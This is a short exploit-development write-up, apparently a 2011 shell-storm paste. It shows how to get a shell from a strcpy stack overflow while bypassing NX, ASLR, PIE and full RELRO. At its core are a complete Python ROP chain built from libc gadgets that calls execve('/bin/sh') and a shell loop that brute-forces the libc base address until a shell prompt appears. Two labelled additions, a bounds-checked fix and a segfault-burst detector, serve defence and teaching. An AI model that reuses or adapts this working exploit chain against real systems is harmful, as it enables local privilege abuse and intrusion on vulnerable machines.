Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO

Dec 1st, 2011
Simple vulnerable binary:

[jonathan@Archlinux rop-bf]$ cat main.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char buff[32];

  strcpy(buff, argv[1]);

  return (0);
}

Compiled with "gcc -o main main.c -pie"

PIE    Enable
ASLR   Enable
NX     Enable
RELRO  Full
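Added example (not from the original paste, and not part of ROPgadget): the same main.c with the strcpy() replaced by a bounds check. PIE, ASLR, NX and RELRO only change where the chain must land; they do not remove the overflow itself. This version rejects any argument that does not fit in the 32-byte buffer, so the 44 bytes of padding plus chain never reach the saved return address. A stack canary (-fstack-protector-strong, not among the protections listed above) would additionally abort on a contiguous overwrite of the saved return address even if this check were missing. copy_arg() is a name chosen here.

```c
/* Added example: bounds-checked replacement for the strcpy() in main.c above.
 * Not code from the original paste; copy_arg() is a name chosen here. */
#define _POSIX_C_SOURCE 200809L   /* for strnlen() */
#include <stdio.h>
#include <string.h>

/* Copy src into dst (dstsz bytes) only if it fits, NUL terminator included.
 * Returns 0 on success, -1 if the input is missing or too long. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    if (src == NULL || dstsz == 0)
        return -1;
    size_t len = strnlen(src, dstsz);   /* never scans past dstsz bytes */
    if (len >= dstsz)                   /* no room for the terminator: reject */
        return -1;
    memcpy(dst, src, len + 1);          /* len + 1 <= dstsz by the check above */
    return 0;
}

int main(int argc, char **argv)
{
    char buff[32];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    /* The 44-byte padding of the chain above is refused here, before any
     * byte is written past the end of buff. */
    if (copy_arg(buff, sizeof(buff), argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof(buff) - 1);
        return 1;
    }
    printf("copied: %s\n", buff);
    return 0;
}
```

Build it with "gcc -o main main.c -pie -fstack-protector-strong" to keep the listed protections and add the canary; the check, not the flags, is what closes the bug.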


Search gadgets with ROPgadget

[jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
Gadgets information
============================================================
0x000003e6: pop %edi | ret
0x00000405: add $0x08,%esp | pop %ebx | ret
0x00000408: pop %ebx | ret
0x00000492: mov (%esp),%ebx | ret
0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
0x0000051e: pop %ebp | ret
0x0000054f: call *%eax
0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
0x00000554: pop %ebx | pop %ebp | ret
0x00000595: mov $0x81ffffff,%esi | ret
0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret

Unique gadgets found: 11


Fuck, just 11 gadgets found. :/


So we search for gadgets in /lib/libc.so.6 instead and brute-force its base address: the chain is built for one fixed guess, and since every run is a fresh process with a new layout, repeating it until the guess matches eventually succeeds.

Exploit:

[jonathan@Archlinux rop-bf]$ cat exploit.py
#!/usr/bin/python2

from struct import pack

base_addr = 0xb770a000

p = "a" * 44
# execve /bin/sh generated by RopGadget v3.3
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020)  # @ .data
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "/bin"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret
p += "//sh"
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x0006c8ba) # mov %eax,(%ecx) | ret
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242) # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", base_addr + 0x00178020) # @ .data
p += pack("<I", base_addr + 0x00001a9e) # pop %edx | ret
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", base_addr + 0x00030bb0) # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x00026632) # inc %eax | ret
p += pack("<I", base_addr + 0x0002dc45) # int $0x80

print p


OK, let's brute-force:

[jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
sh-4.2$

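Added example, not from the original paste: each failed guess in the loop above crashes ./main, and the Linux kernel records such crashes as "comm[pid]: segfault at ... ip ... sp ... error N in obj" lines. Dozens of them from the same program within a few seconds is the footprint this brute-force leaves on a host, and it is cheap to look for. The C program below parses lines of that shape and flags a burst. The log lines are constructed for the example (an epoch-second timestamp prefix is assumed in place of syslog's usual date), and parse_segfault(), max_crash_burst(), is_bruteforce() and the window and threshold values are choices made here, not anything from the page.

```c
/* Added example: detect a burst of segfaults from one program in kernel log
 * lines, the host-side signal of the libc-base brute-force shown above.
 * Not code from the original paste; names and sample lines are constructed. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define MAX_EVENTS 1024

/* Fields of one kernel segfault message that the detector uses. */
struct segfault {
    long ts;            /* seconds since epoch (constructed timestamp prefix) */
    char comm[32];      /* crashing program name */
    unsigned long ip;   /* faulting instruction pointer */
};

/* Parse "<ts> kernel: <comm>[<pid>]: segfault at <addr> ip <ip> sp <sp> ...".
 * Returns 1 on success, 0 if the line is not a segfault record. */
int parse_segfault(const char *line, struct segfault *out)
{
    long ts; int pid; char comm[32]; unsigned long at, ip, sp;
    if (sscanf(line, "%ld kernel: %31[^[][%d]: segfault at %lx ip %lx sp %lx",
               &ts, comm, &pid, &at, &ip, &sp) != 6)
        return 0;
    out->ts = ts;
    out->ip = ip;
    snprintf(out->comm, sizeof out->comm, "%s", comm);
    return 1;
}

/* Largest number of segfaults of `comm` that fall inside any span of
 * `window` seconds; lines are assumed to be in time order (sliding window). */
int max_crash_burst(const char *const *lines, size_t n, const char *comm, long window)
{
    long times[MAX_EVENTS];
    size_t count = 0, start = 0;
    int best = 0;
    for (size_t i = 0; i < n && count < MAX_EVENTS; i++) {
        struct segfault sf;
        if (!parse_segfault(lines[i], &sf) || strcmp(sf.comm, comm) != 0)
            continue;                      /* other programs and non-crash lines */
        times[count++] = sf.ts;
        while (times[count - 1] - times[start] > window)
            start++;                       /* drop events older than the window */
        if ((int)(count - start) > best)
            best = (int)(count - start);
    }
    return best;
}

/* 1 if `comm` crashed at least `threshold` times within `window` seconds. */
int is_bruteforce(const char *const *lines, size_t n, const char *comm,
                  long window, int threshold)
{
    return max_crash_burst(lines, n, comm, window) >= threshold;
}

/* Constructed sample log: six crashes of ./main within five seconds (the
 * brute-force loop), one unrelated crash, one non-segfault kernel line. */
static const char *const sample_log[] = {
    "1322740800 kernel: main[2001]: segfault at 42424242 ip 42424242 sp bffff3c0 error 14 in main[b7760000+1000]",
    "1322740800 kernel: main[2002]: segfault at 42424242 ip 42424242 sp bffff3c0 error 14 in main[b7760000+1000]",
    "1322740801 kernel: usb 1-1: new high-speed USB device number 4 using ehci_hcd",
    "1322740801 kernel: main[2003]: segfault at b7595baf ip b7595baf sp bffff3c0 error 4 in libc-2.14.so[b7580000+1a0000]",
    "1322740802 kernel: firefox[1500]: segfault at 0 ip b6f1a2c0 sp bfe0c3d0 error 4 in libxul.so[b6c00000+2000000]",
    "1322740802 kernel: main[2004]: segfault at 42424242 ip 42424242 sp bffff3c0 error 14 in main[b7760000+1000]",
    "1322740803 kernel: main[2005]: segfault at 42424242 ip 42424242 sp bffff3c0 error 14 in main[b7760000+1000]",
    "1322740804 kernel: main[2006]: segfault at 42424242 ip 42424242 sp bffff3c0 error 14 in main[b7760000+1000]",
};
#define SAMPLE_LOG_LEN (sizeof sample_log / sizeof sample_log[0])

int main(void)
{
    const char *progs[] = { "main", "firefox" };
    for (size_t i = 0; i < 2; i++) {
        int burst = max_crash_burst(sample_log, SAMPLE_LOG_LEN, progs[i], 10);
        printf("%-8s %d segfaults in a 10 s window -> %s\n", progs[i], burst,
               is_bruteforce(sample_log, SAMPLE_LOG_LEN, progs[i], 10, 5)
                   ? "brute-force suspected" : "ok");
    }
    return 0;
}
```

The repeated ip value of 0x42424242 in the constructed lines is itself a useful field to alert on: a fixed guess that misses lands at the chain's padding word, so the faulting address is the same run after run, whereas ordinary crashes of a program scatter.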
New feature in a future ROPgadget: ROPmaker for brute-forcing libc


- http://shell-storm.org/project/ROPgadget/

@jonathansalwan
